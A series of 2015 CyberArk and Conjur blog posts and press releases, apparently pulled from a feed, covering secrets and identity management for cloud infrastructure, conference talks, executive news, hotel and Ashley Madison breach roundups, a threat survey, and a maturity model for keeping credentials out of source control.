With the advent of Cloud Computing, Mobile Endpoints, and IoT, Data Center Infrastructure and Security models have shifted from well-defined perimeters that were protected by firewall appliances, static policies, and monolithic stacks to dynamic, software-defined infrastructure powered by virtualization and containerization. The perimeter is now elastic and can’t be defined or secured by static policies.  Host and Endpoint Security has shifted to a distributed model that is driven by dynamic policies, ephemeral machine instances, and immutable infrastructure.

One major component of Infrastructure hasn’t kept pace with this transformation, and that is Identity, Access, and Secrets Management for Users, Services, and Machines. The traditional solutions of /etc/passwd, LDAP, and Active Directory lack flexible context for these new architectures, and as the 2015 breach reports show, a lack of rigor around Identity Credentials is the root cause for the majority of them.  Another challenge for CIOs and Infrastructure leaders is the development and maintenance of “home grown” solutions, that typically solve a tactical challenge, but fall short strategically, and then inevitably lose support over time and become “orphaned”. This approach usually creates more security challenges than solutions.

The two basic components of Identity Security are:

  • Authentication (AuthN) :: Are you who you say you are?

  • Authorization (AuthZ) :: Do you have the access rights to perform the requested action?

Cloud and Microservice architectures along with Cloud-Native applications require a new Identity and Security orchestration solution; one that is API-driven, dynamic, and adaptive. Ephemeral instances and services need a new approach to AuthN and AuthZ, where access rights have an expiration time, secrets such as API keys, tokens, and certificates are rotated at specific intervals, and, most importantly for security and compliance, a complete audit log is kept. Traditional ACLs are unable to provide the level of granularity for security, and even host-based approaches don’t translate to this new architecture due to challenges around eventual consistency. Services and Machines need to perform both AuthN and AuthZ operations in real-time, instead of having static rules applied to them.

Conjur’s Next-Gen Identity Security Platform is the only one on the market built with the new stack in mind. Identity Security has shifted from static policies on monolithic systems to dynamic policies that adapt to architectural changes and new ephemeral services.  User Authentication and Authorization is now powered by a RESTful API and Elastic Policies can be applied to Users, Machines, and API endpoints.

Because Authorization rules can be applied to both users and machines, your API endpoints can now have a much finer level of security granularity, instead of simply being Public or Private.  Policy Enforcement is decoupled from the underlying infrastructure and becomes proactive instead of reactive, and is also built upon Role Based Access Control (RBAC). Security is now woven into the fabric of applications instead of being a shield in front of them.

SSH Key management shifts from the distribution of public-keys to every host in your infrastructure (eventually consistent) to a centralized, secure host that applies both AuthN and AuthZ policies at login time. All activity is securely logged to an immutable audit log, which bolsters your overall security insight, as well as provides rich context for your SOX, PCI, and other compliance requirements.

 

Secrets such as passwords, API Keys, and SSL Certificates should never be stored in source-code files. Conjur’s Summon allows you to securely move secrets out of source code and inject them from a configurable secrets provider  into the process environment at run-time. 

 

Policy configuration and management moves out of disparate configuration files into a single-pane-of-glass UI that allows complete visibility into the Infrastructure, complete with detailed reports for insight, audit, and compliance.

 

 

]]>
Conjur’s CEO Speaks on Security Panel at Velocity New York https://www.cyberark.com/blog/conjurs-ceo-speaks-on-security-panel-at-velocity-new-york/ Wed, 07 Oct 2015 12:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjurs-ceo-speaks-on-security-panel-at-velocity-new-york/  

Conjur’s CEO, Elizabeth Lawler Speaks on “Finance, Security, and Modern IT Infrastructure,” Panel at Velocity New York – October 12-14, 2015 – New York, New York

Press Release:

WALTHAM, Mass. Oct. 7, 2015 Elizabeth Lawler, CEO at Conjur, Inc., provider of security orchestration software, is speaking on the panel, “Finance, Security, and Modern IT Infrastructure,” at Velocity New York, taking place on Monday, October 12 – Wednesday, October 14, 2015 in New York, New York. Most companies with outward-facing dynamic websites face the same challenges: pages must load quickly, infrastructure must scale efficiently, and sites and services must be reliable, without burning out the team or breaking the budget. Velocity is the best place for Web ops and performance professionals to learn from peers, exchange ideas with experts and share best practices.

velocity2015_svg_logo

WHAT:           Conjur’s CEO Elizabeth Lawler Speaking on Panel, “Finance, Security, and Modern IT

Infrastructure,” at Velocity New York

WHEN:           Monday, October 12, 2015, 3:30 p.m. – 4:05 p.m. EDT

 WHERE:         New York Hilton Midtown, 1335 Avenue of the Americas, New York, New York –

Rhinelander South

For Web-first companies, the old infosec models of simply locking everything down have fallen by the wayside in favor of new approaches that allow businesses to move quickly and improve their security practices simultaneously. Where standard security measures and compliance and audit practices used to impede progress, from product design through development and deployment, they are now folded into agile processes, DevOps approaches and tooling, and continuous delivery pipelines. This might all seem like fantasy and vaporware for financial organizations, but it is happening there, too, albeit at a slower pace. This panel brings together security start-ups and veterans to discuss the challenges and opportunities facing financial organizations in this new landscape. Elizabeth Lawler is joined by panelists Courtney W. Nash, Director, Strategic Content at O’Reilly; Jamesha Fisher, DevOps Security Pirate at CloudPassage, Inc. and Zane Lackey, Founder and CSO at Signal Sciences.

Elizabeth Lawler is CEO and co-founder of Conjur, Inc. She has over 20 years of experience working in highly regulated and sensitive data environments. Elizabeth speaks often on how speed, scale, security and compliance can be achieved through organizational, methodological and technological change. Prior to founding Conjur, Elizabeth was chief data officer of Generation Health and held a leadership position in research at the Department of Veterans Affairs. She is a programmer herself and is constantly working to make development and IT systems easier to manage for people working in regulated industries. She holds a doctorate degree and a master’s degree in biostatistics and epidemiology from Boston University.

For more information on Velocity New York, visit: http://velocityconf.com/devops-web-performance-ny-2015.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based open source tools so that security best practices can become part of every software development activity and IT environment. Customers include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow on Twitter @conjurinc.

Contact:
Tracy Wemett
BroadPR
+1-617-868-5031

 

]]>
Conjur Presents on Using Puppet with a Secret Server at PuppetConf 2015 https://www.cyberark.com/blog/conjur-presents-on-using-puppet-with-a-secret-server-at-puppetconf-2015/ Mon, 05 Oct 2015 13:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-presents-on-using-puppet-with-a-secret-server-at-puppetconf-2015/  

Conjur’s Josh Bregman Talks about Speeding the Path to Security and Compliance with Secrets Servers at PuppetConf – October 5-9, 2015 – Portland, Oregon

WALTHAM, Mass. Oct. 5, 2015 Josh Bregman, Vice President at Conjur, Inc., provider of security orchestration software, is presenting, “Using Puppet with a Secret Server,” at PuppetConf 2015, taking place on Monday, October 5 – Friday, October 9, 2015 in Portland, Oregon. Sessions at PuppetConf range from how to get started with Puppet, modules and related technologies, to advanced tips and tricks for using Puppet, PuppetDB, Razor, Facter and more. Software by Puppet Labs, the leading provider of IT automation software, provides system administrators the operational agility, efficiency and insight they need to proactively manage dynamic infrastructure, scaling from tens of servers to thousands, both on premise and in the cloud.

puppetconf-logo

WHAT:           “Using Puppet with a Secret Server,” Presented by Conjur’s Josh Bregman at PuppetConf 2015

WHEN:           Thursday, October 8, 2015, 4:45 p.m. – 5:30 p.m. PDT

WHERE:         Oregon Convention Center, 777 NE Martin Luther King Jr Blvd, Portland, Oregon – Oregon

Ballroom 202

The year 2015 is shaping up as the “year of the secrets server,” with numerous open source and commercial options now available. Secrets servers offer important advantages compared to storing secrets in configuration management. From a security standpoint, secrets servers speed the path to security and compliance certification, offering capabilities such as end-to-end encryption, access control, detailed auditing of access, purpose-built APIs, dedicated management and reporting tools, and support for auto-scaling deployment architectures. Furthermore, using a secrets server enables DevOps teams to roll back the “lockdown” and re-establish the collaborative workflows that configuration management was developed to encourage.

Josh Bregman has 20 years of experience successfully architecting, evangelizing and delivering innovative identity management and security products to customers. Prior to joining Conjur, Josh spent a decade as a solutions and pre-sales leader in the Oracle ecosystem. A developer at heart, early in his career Josh worked as a software engineer at IBM, GTE Labs and Netegrity. He has two U.S. patents and received a bachelor’s degree in math from the University of Rochester. Follow Josh on Twitter @kingoauth.

Conjur is a Silver Sponsor of PuppetConf 2015. For more information, visit: https://2015.puppetconf.com.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based open source tools so that security best practices can become part of every software development activity and IT environment. Customers include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow on Twitter @conjurinc.

Contact:

Tracy Wemett
BroadPR
+1-617-868-5031

All trademarks recognized.

#

 

]]>
Hackers…Checking In https://www.cyberark.com/blog/hackers-checking-in/ Wed, 30 Sep 2015 20:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/hackers-checking-in/  

The names Trump and Hilton have graced headlines this week… and not for the reasons you may suspect. No, there was no celebrity feud or off-color remark. Both the Hilton Hotel and Trump Hotel Collection have suffered cybersecurity breaches, forcing recent travelers to comb through credit card statements looking for suspicious activity, further augmenting their post-vacation blues.

Untitled_designWe’ve heard these data breach stories time and time again and yet it seems that we, the actual victims, are the only ones paying attention. It forces the question: do companies simply not understand how important data security is? This lack of attention to keeping information secure, puts us, the buyer, in a very difficult position. Normally, if you have a bad experience at one business you can take your business elsewhere, giving their competitor the chance to wow you. However, what do we do in this scenario? We can’t just try out a new hotel or retail chain, because their competitor has most likely had, or is at risk of having, a breach as well if their data isn’t properly secured.

Here’s the latest information on the Hilton Hotel and Trump Hotel Collection security hacks:

This piece on Softpedia says the breach affects guests who stayed at Trump SoHo New York, Trump National Doral and the Trump International locations in New York, Chicago,  Waikiki, Las Vegas, and Toronto between May 19, 2014 and June 2, 2015. It confirms that credit card information like the number, expiration date, and security code were exposed as well as first and last name for guests at select hotel locations.

This piece from The Street discusses both the Hilton and Trump Breaches. It cautions that although these two were publicized, many other hotels are likely being hacked by cybercriminals since the attacks are undetectable and places don’t even realize they are happening. Since hotels are typical destinations for people with money, they are a desirable target, hackers constantly scanning systems for vulnerabilities.

In this article from CSO Online, Dave Lewis writes that enterprises need to do a better job of strengthening their defenses against cybercriminals. He also points out that although Trump Hotels is providing fraud resolution services to guests for the next year to people residing in the U.S. (something mandated by law) international guest are excluded.

According to this piece the Hilton breach may have occurred as early as last November. POS devices from the chains restaurant, coffee bars, and gift shops were potentially effected, putting more than just hotel guests at risk.

This report revelas that Hilton properties such as Embassy Suites, Doubletree, Hampton Inn and Suites, and the Waldorf Astoria Hotels & Resorts are potentially affected by the breach. The articles outlines 3 things you should do if you think your information was compromised.

Looks like it’s time to pull out that tattered sleeping bag and tent and vacation the good, old-fashioned way, sans credit cards…and 5 star amenities.

 

]]>
Introducing the CyberArk 2015 Global Advanced Threat Landscape Survey https://www.cyberark.com/blog/introducing-the-cyberark-2015-global-advanced-threat-landscape-survey/ Wed, 30 Sep 2015 10:24:55 +0000 https://www.cyberark.com/blog//

Today we unveiled the findings from our 2015 Global Advanced Threat Landscape Survey. Now in its ninth year, this report pinpoints cyber security trends and emerging risks based upon a compilation of interviews with 673 IT security and C-level executives from organizations around the globe.

The primary takeaway is clear: Cyber attacks that exploit privileged and administrative accounts – the credentials used to manage and run an organization’s IT infrastructure – represent the greatest enterprise security risks today.

While we encourage you to read the full, free report, here’s our take on some of the key findings:

More than a Data Breach – Complete Network Takeover
The majority of respondents (61 percent) cited privileged account takeover as the most difficult stage of a cyber attack to mitigate, up from 44 percent in last year’s study. Awareness of this security risk has increased and for good reason. High profile attacks on Sony Pictures, the U.S. Office of Personnel Management (OPM) and others illustrate how, with privileged credentials in-hand, attackers can exfiltrate sensitive data or conduct a hostile takeover of network infrastructure. This new reality highlights the threat of privileged account hijacking within the enterprise, yet many organizations still struggle to identify and locate privileged accounts across their networks. If they can’t find them, how can they protect them?

Corporate Confidence and a False Sense of Data Security
Despite mounting evidence to the contrary, 44 percent of respondents continue to believe they can keep motivated attackers off the network or reasonably discover them once they’ve infiltrated an organization. This confidence is misplaced. Today, it is no longer acceptable for organizations’ security programs to presume they can keep attackers off their network. They must adopt the mindset that the attacker has already made it inside.

Organizations Fail to Recognize Emerging Threats Inside the Network
When asked to rank the type of attacks they were most concerned about, many respondents pointed to perimeter attacks, such as phishing (70 percent), as their primary concern. There was less awareness about potentially devastating compromises that happen within the network, such as Pass-the-Hash and Kerberos attacks, including Golden Ticket that can enable complete control over a target’s network by taking over the domain controller. It’s time for business and IT leaders to turn their focus to what can be done to stop attackers once they are inside the network and recognize that phishing and other unsophisticated means of attack will happen, and they will be successful.

Today’s most damaging attacks occur when attackers steal privileged and administrative credentials and gain the same level of access as the internal people managing the systems. This puts an organization at the mercy of an attacker’s motivation, be it financial, espionage or causing harm to the business. With ongoing education and increasing awareness about the devastating fallout of privileged account takeover, there is an accelerated shift in the industry’s security mentality.

To learn more, download the 2015 Global Advanced Threat Landscape Survey at https://www.cyberark.com/ThreatSurvey2015.

]]>
Conjur CEO Elizabeth Lawler Speaking on Panel at MassTLC Security Conference https://www.cyberark.com/blog/conjur-ceo-elizabeth-lawler-speaking-on-panel-at-masstlc-security-conference/ Tue, 29 Sep 2015 21:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-ceo-elizabeth-lawler-speaking-on-panel-at-masstlc-security-conference/ Our CEO, Elizabeth Lawler, will be speaking at the MassTLC Security Conference at the Federal Reserve Bank in Boston tomorrow (9/30). The event “The Business of Security: Impacting Your Company’s Resiliency, Reputation and Revenue,” will focus on the increasing impact of security on businesses.

Elizabeth will be participating in a panel discussion tomorrow (9/30) from 1:45 – 2:25pm. The Session “Coming Soon! The Next Security Mecca-Boston!,” will focus on how we can grow and learn through investment, mentoring, education, and buying local to ensure the strength of not only our individual business but also the entire Boston security sector.
Earlier this week, Elizabeth sat down with Clare Madden to discuss why Enterprises in the Boston area need to do more to become design partners with security startups. 

Why is stepping up security, immediately, particularly important to your company/industry?
My industry is cyber security, so this is a bit of a skewed reply. However, what we are observing from the breaches of the last 4 years is that there were two classes of companies: 1) high velocity IT innovators and new technology adopters who were breached (LinkedIn, Facebook, Uber, etc) who were required to cobble together cyber security solutions to address technology gaps in their infrastructure, and 2) companies who cannot innovate in the IT space owing to cyber security concerns/constraints.
 
So stepping up security has a positive impact to the business directly (faster IT innovation, faster time to value) for both cohorts of companies.
What is the key obstacle companies like yours face in bringing security up to where it needs to be?
Lack of tooling in next generation infrastructure, difficulty hiring, organizational alignment around methodologies and technologies, rather than technology alone as a remediation
What is the next step that you recommend the local community takes to ensure that Boston becomes the next security Mecca?
The trope, regarding east coast “rounds and valuations” and west coast “rounds and valuations”, causes great early stage companies to seek alternatives. Enterprises in the Boston area need to do more to become design partners with security startups, particularly since there are cyber security domain expert talent pools in the startup community.
Interested in attending the Conference? Good news, tickets are still available. Register Now! Don’t forget to check out the entire conference agenda to see what other great speakers will be participating!

 

]]>
Conjur Welcomes New Chief Operating Officer https://www.cyberark.com/blog/conjur-welcomes-new-chief-operating-officer/ Tue, 22 Sep 2015 13:26:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-welcomes-new-chief-operating-officer/  

Press Release:

Serial Entrepreneur Mark Saccone Brings 30 Years of Cross-Functional Expertise in Sales, Marketing, Finance, Operations, Engineering, and Technology to Conjur COO Role

WALTHAM, Mass. – Sept. 22, 2015Conjur, Inc., the leading provider of security orchestration software, has named Mark Saccone as the company’s new Chief Operating Officer (COO). Most recently, Mark was COO of 360BrandVision, a 3-D holographic delivery platform company. Mark has 30 years of experience building high growth organizations with a cross-functional background in senior finance, strategic planning, sales and marketing, operations, engineering, and management.

“Mark is a seasoned leader whose decades of prior experience and success will help to accelerate Conjur’s growth,” said Elizabeth Lawler, CEO at Conjur. “As we work closely together to shape Conjur’s operational strategy, I am confident that, with Mark’s steady guidance, we will optimize Conjur’s operations practices to assure market leadership for the company’s transformational security and compliance technology.”

MarkMark previously founded two startups, TalMark Nutrition and Emplanet, and has been the second employee at two other companies. He was VP of Finance at DocBox, Inc. and COO at Optimatum Group. He was also Director, Product Management & Development, Strategic Marketing at Fidelity Investments. Mark earned a master’s degree in business administration from Duke University’s Fuqua School of Business and a bachelor’s degree in industrial engineering and operations research from the University of Massachusetts – Amherst.

“I joined Conjur because I see incredible potential to build a new platform for a market opportunity still in its infancy, but growing exponentially,” said Mark Saccone. “The co-founders have an incredible vision and have done a great job creating a product that solves security and compliance vulnerabilities found in a variety of vertical sectors, such as finance, health care, retail and government. My focus is to rapidly scale the organization while delivering more capabilities and satisfied customers.”

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based open source tools so that security best practices can become part of every software development activity and IT environment. Customers include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow on Twitter @conjurinc.

PRContact:
Tracy Wemett
BroadPR
+1-617-868-5031

 

]]>
Conjur Participates at DevOpsDays Boston 2015 https://www.cyberark.com/blog/conjur-participates-at-devopsdays-boston-2015/ Tue, 15 Sep 2015 12:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-participates-at-devopsdays-boston-2015/  

Press Release:

Conjur Discusses Security Orchestration Solutions at DevOpsDays Boston – September 15-16, 2015 – Cambridge, Massachusetts

WALTHAM, Mass. Sept. 15, 2015 Conjur, Inc., provider of security orchestration software, is a Gold Sponsor of DevOpsDays Boston, taking place on Tuesday, September 15 – Wednesday, September 16, 2015 in Cambridge, Massachusetts. DevOpsDays events are organized locally worldwide and bring operations and development teams together to collaborate. Dustin Collins, Developer Advocate at Conjur, has been the organizer of many past DevOps related Boston events.

WHAT:                  Conjur at DevOpsDays Boston 2015

WHEN:                  Tuesday, September 15 – Wednesday, September 16, 2015

WHERE:               Microsoft NERD Center, 1 Memorial Drive #1, Cambridge, Massachusetts

devops_days_boston_logoContinuous software delivery and automated deployment pipelines (DevOps) deliver tremendous value to companies across various industries. As more applications and workloads are incorporated into these practices, security and compliance remain top of mind. Conjur’s security orchestration software is an integral piece of the technical toolchain and Conjur’s infrastructure and software management approaches are something that IT executives need in order to establish a clear Agile, DevOps Blueprint. Conjur helps with privileged user IDs and credentials, as well as maintains separation of duties. The company also enables secure access to on-demand services and infrastructure, compliance and governance maintained by test and release automation as well as traffic and service authorization.

Stop by the Conjur table to learn more. Technical team members will be in attendance and attendees will be able to sign up for a live demo or self-paced, interactive tutorials. There is a raffle for a gift card for an Odyssey cruise for the winner and five team members as well as a Rubik’s cube challenge. Anyone who completes the puzzle in under two minutes wins a $25 American Express gift card.

DevOpsDays Boston is currently sold out. For more information or to join the waitlist, visit: http://www.devopsdays.org/events/2015-boston/.

Conjur provides a cloud-native platform for directory services, authorization, audit and compliance so that security best practices can become part of the fabric of every software development activity and IT environment. For more information, visit: https://www.conjur.net/products.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based Open Source tools so that security best practices can become part of every software development activity and IT environment. Clients include Netflix, The Broad Institute, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow @conjurinc.

PRContact:
Tracy Wemett
BroadPR
+1-617-868-5031

 

]]>
Flirting With Security https://www.cyberark.com/blog/flirting-with-security/ Thu, 10 Sep 2015 13:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/flirting-with-security/  

The Ashley Madison Hack has been all over the news in recent weeks, and why wouldn’t it be? It has all of the drama and shock factor we crave, standing out in a sea of run-of-the-mill hack and breach stories, this hack dealing with marriage and infidelity. What is surprising is that our attention is so focused on who is cheating on their spouse that we are missing the bigger picture. Whether the story is about medical records, vehicles, social security numbers, or infidelity exposed the common theme is that businesses are not keeping our information safe, they are not doing enough to make sure our identity is protected.

amadisonWhat is even more shocking is that despite every story of a leaked photo or a stolen credit card we continue to put our faith into these business without demanding protection. Having our information in digital records is often a necessity for conducting business and therefore protecting this personal information must be the company’s top priority. All of these breaches show us one thing… protecting our data isn’t a priority. We need to start focusing on reading past the sensationalized text and focus on the real problem, our security.

 

Here are some different takes on the Ashley Madison hack:

Ashley Madison Chief Executive Noel Biderman was let go in the wake of the Ashley Madison breach. Biderman, who had previously stated that affairs could be good for society, as long as they were kept secret, seemed to be unable to defend his own principle, the personal information of millions of users exposed.

This piece by Arik Hesseldahl points out that although other companies are able to survive after highly-publicized breaches, it will be tough for Ashley Madison to recover. He also points out that companies should have learned by now that information must be encrypted.

Business Standard reports that the Ashley Madison breach has given spammers a great opportunity to take advantage of those affected. There has been a recent surge in spam emails with domains relating to Ashley Madison. Some victims of the breach have been blackmailed due to the highly embarrassing and personal nature of the leaked information.

This article from Forbes discusses a burning question on everyone’s mind: why hasn’t the FTC made a statement about Ashley Madison or Avid Life Media and whether it will be conducting an investigation. The piece discusses many reasons why the FTC has remained silent up to this point, a main reason being that the FTC could be conducting a pre-investigation which does not require a public announcement.

John McAfee presents an entirely new spin on the story. He argues that the Ashley Madison was not hacked by a group of men, rather, the information was stolen and leaked by one woman who had worked for Avid in the past. He supports this claim through various points, including that the person had a very intimate understanding of the company’s technology stack and that the language in the manifesto seemed to come from a woman, the writer referring to men as “scumbags”.

And one last one, just for laughs…

]]>
From High Powered Rifles to Robot Spiders…Privilege Really Is Everywhere https://www.cyberark.com/blog/from-high-powered-rifles-to-robot-spidersprivilege-really-is-everywhere/ Wed, 09 Sep 2015 17:43:15 +0000 https://www.cyberark.com/blog//

Recent events like Passwords15, Black Hat USA and DEF CON have raised visibility about the evolving cyber security threat landscape – focusing on high profile hacks, new regulations and innovative approaches for protecting organizations’ most precious assets.

Sessions and demonstrations focusing on topics like defeating pass-the-hash attacks, managing active directory backdoor risks, and taking control of everything from a car to a power plant highlight vulnerabilities that exist in nearly everything we interact with.

Several of these sessions, including our own that examined Kerberos attack trends, incorporated a privileged account security connection. One of the more surprising connections was the hack of the TrackingPoint sniper rifle scope. Wired covered the hack in detail, but sitting in the audience hearing about how persistent the research duo was in finding different avenues for breaking into (hint: it got destructive) and gaining control over the WiFi-enabled scope was impactful.

Understanding the sheer determination of attackers – whether motivated by simple curiosity or malicious intent– has valuable lessons for any organization: Attackers will get in, it’s just a matter of when and how.

In this case, the researchers took advantage of multiple vulnerabilities including the rifle scope’s default passwords and used SSH keys to gain root access and make changes to the Linux-based system – altering factors such as ballistics values and temporarily locking the trigger. One of the overall messages was that vendors and development teams often ignore “low hanging fruit”– like better managing passwords in embedded devices. In the new world order of interconnected devices, security must be built in.

One of the lighter moments of the talk came when sharing a note to customers from the gun manufacturer’s website in response to the well-publicized hack: “… Please note the following: Since your gun does not have the ability to connect to the internet, the gun can only be compromised if the hacker is actually physically with you. You can continue to use WiFi (to download photos or connect to ShotView) if you are confident no hackers are within 100 feet.”

Shifting gears slightly to the Intel Developer Forum, security was center stage when GM of Intel Security Group, Chris Young, addressed security through the perspectives of consumer and enterprise users. The messages were consistent: security must be baked into everything – every application, every device, every system. Most importantly, it must complement the user experience, not impede it.

Intel CISO Brent Conran spoke about the complexity of his own IT environment and the company’s partnership with CyberArk to go beyond perimeter defenses to protect privileged accounts – which are often sought by attackers as a powerful pathway to accessing sensitive data. A Data Center Knowledge article highlights CyberArk CEO Udi Mokady joining Conran on stage to talk about the real and increasingly dangerous cyber threats posed by a lack of control over privileged accounts and credentials – including those used to enable applications to communicate with other enterprise applications or databases.

 
 

The Intel security session concluded with the on-stage hack of a spider-looking robot (technically a hexapod), which was protecting an enormous donut. While far less threatening than the rifle example, in the on-stage demonstration, “Hacker Jenny” was able to get root access to the software controlling the robot via the cloud, and simply put it to sleep, presumably so she could steal the delicious donut.

 

So whether it’s a rifle, a robot or a car – privilege really is everywhere. In the end, it doesn’t matter if the attackers are 100 feet or 2,000 miles away. Privileged accounts are just too tempting for a persistent attacker to resist.

]]>
All Of Your Robots Belong To Us https://www.cyberark.com/blog/all-of-your-robots-belong-to-us/ Tue, 08 Sep 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/all-of-your-robots-belong-to-us/  

[Note: Conjur’s first blog post out of stealth in December of 2013 was entitled “Take command of  your robot army”.  The robot army is still out there, and growing!  This post revisits some of the same concepts through the lens of 2015 IT Operations.]

In the above context, “Us” used to refer to Developers, Operations, and End Users. With the advances in Cloud, Big Data, Containerization, MicroServices, IoT, etc…, “Us” now extends to mobile devices (Smart Phones, Tablets, Wearables), Ephemeral Machine Instances (VMs and Containers), Beacons/Sensors, automated infrastructure workflows and build and deploy pipelines.  In other words, robots (aka. “code”) is running the show.

Picture1_robot_army_

Traditional perimeter-based approaches to System and Data Security are no longer viable or effective in today’s Cloud-native and Software-Defined world.  Companies need to start strategically thinking about how they manage and govern access by developers, infrastructure users, machines, and services identities in order to ensure that security is implemented consistently throughout the new  IT stack.

In Verizon’s 2015 Data Breach report, 3 of the top 4 causes of breach were due to stolen credentials of internal users or system-level accounts. The latter, which tend to be the command center for robot armies, are typically the most disruptive and costly.

The starting place for securing the increasingly diverse army of “robots” has been to implement point solutions over existing technologies.  This leads to having common security controls spread across many technologies: passwords are stored in files, HSMs, and config repositories, /etc/sudoers files are stored in configuration management and Cloud IaaS IAM systems, traffic authentication rules are stored in source code repositories.  Security sprawl and security breakdown.

Picture2_robot_army

In previous eras, when the topology of IT systems was more homogenous, managing merely one of the axes of access control – “Identity”, was reasonably straightforward. The system of record was a singular directory of users stored in either Active Directory or LDAP.  With the onset of Cloud Computing, Virtualization, and now Containerization plus Microservice Architectures, the notional responsibilities associated with “Identity” have been extended to machines, instances, and microservices, all which can be ephemeral.  This new set of users is what we describe as your “Robot Army”. This now results in a very complex Identity and Access Management challenge that requires a completely new approach.

Securing Your Robot Army From Breaches

Picture3.png_robot_army

Your robots will be smart, as they typically have full and direct access to more data and information than standard users do. As a result, they are an attractive attack vector and if compromised, they will give the hacker full access to whatever their code contains. Once the hacker has control over a robot, they can perform malicious activities such as escalation of privileges to access and steal sensitive data or delete important systems or data. Managing your robot army should be approached the same way you manage and administer roles and access-rights of your normal users. Security practices like “least-privilege” and role-based access control should be implemented, along with an immutable Audit log of all activity, to help mitigate either malicious or unintentional access to critical systems and data.

How Large Is Your Robot Army?

Picture4_robot_army

The answer to that question depends upon where your organization is with respect to Cloudinfrastructure and other “new stack” technology like microservices. Are you using Public Cloud Infrastructure such as Amazon Web Services or Microsoft Azure? Perhaps you also have a Private Cloud and other on-premises systems. Have you implemented a containerization strategy? Have you deployed a Continuous Integration and Delivery system? Most likely your answers are all yes, or partially yes along with plans to deploy new technology in the upcoming months. Your Robot Army is already probably larger than you initially believed, and growing each day.

Securing Your Robot Army

Picture5_robot_army

At the core, a new platform is required to identify, manage, control and audit all these new system actors.  One that has been purpose-built with API controls for Authentication and Authorization. Manual or one-off processes don’t allow you to move at the speed of DevOps and Cloud, and are often times fraught with human error.

The platform should also include a comprehensive Audit log for Security and Compliance, and communication with internal and external teams.  Microservices should also be part of your Authorization strategy. APIs shouldn’t be completely open, and service-level authorization adds another layer of security, complete with an audit log for compliance and review.

With a solution like this deployed, you can be assured that your Robot Army remains under your full control and that evil Robots won’t be taking over your Infrastructure.

 

]]>
Secrets and Source Control: A Maturity Model https://www.cyberark.com/blog/secrets-and-source-control-a-maturity-model/ Fri, 04 Sep 2015 20:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/secrets-and-source-control-a-maturity-model/  

Today I want to talk about secrets and source control. Earlier this week, Carlo from humankode posted an article about how a bug in Visual Studio 2015 exposed his source code on GitHub and cost him $6,500 in a few hours. In short, there is a bug in VS2015 that publishes your source code to a public repo even though you explictly say you want the repo to be private. His AWS keys were in the repo, a bot scanned them and launched a bunch of instances. That post has received a lot of attention, and it should. We should have full control over the visibility of the software we write, for a variety of reasons. However, public or private, if we check our credentials into source control we bear some responsibility for their misuse. In this post, I’ll cover three different ways to handle secrets in source control, framed in a maturity model.

From least to most refined, this is the maturity model for secrets in source control:

  1. Checked directly into source control.
  2. Tracked outside source control.
  3. Referenced by source control.

Let’s cover them one-by-one.

Checked directly into source control

Most agree that this is a bad idea, for several reasons. I’m going to to focus on the friction it causes in collaborative environments.

  • Visibility into who/what has access to credentials is difficult. If you want to manage access to those credentials, you have to start locking down source control. And your CI system. And your Chef server. The list goes on. Now these tools that are meant for collaboration have a mess of rules to navigate. This limits their effectiveness and introduces bottlenecks (“file a ticket for access to that Jenkins job”).
  • Credential rotations are now tied to application/infrastructure deploys. Tying deploys to rotations has the effect of slowing everything down and introducing interesting chicken-and-egg “opportunities”. Let’s face it: many of us have not achieved continuous delivery yet. Here’s what happens. An engineer has pushed a feature to a cookbook, but is still working on the tests, to be committed soon.  We need to rotate a database password. So, do we push the code without tests or roll back the change for now to get the rotation deployed? Neither option is desirable.
  • Encrypting credentials and checking them in is not a solution. It creates another problem, maintaining and distributing decryption keys. These keys are just new secrets.

Tracked outside source control

We have removed all secrets from our code and manage them in a system outside source control. This is a step in the right direction, but it only solves some of our problems and adds new ones to the mix.

  • One of the learnings from the annual State of DevOps reports is that in order to be a high-performing IT organization, you need to be able to recreate your production environments entirely from source control. Credentials are a part of your production environment, but now they have been removed from source.
  • Auditing becomes more difficult. We’ve now lost a key benefit of having your secrets in source: a history of who changed what, when. If someone rotates an API token or accesses a SSL cert, we should know when it happened and who did it. A security framework that doesn’t include an immutable audit log is not yet mature.
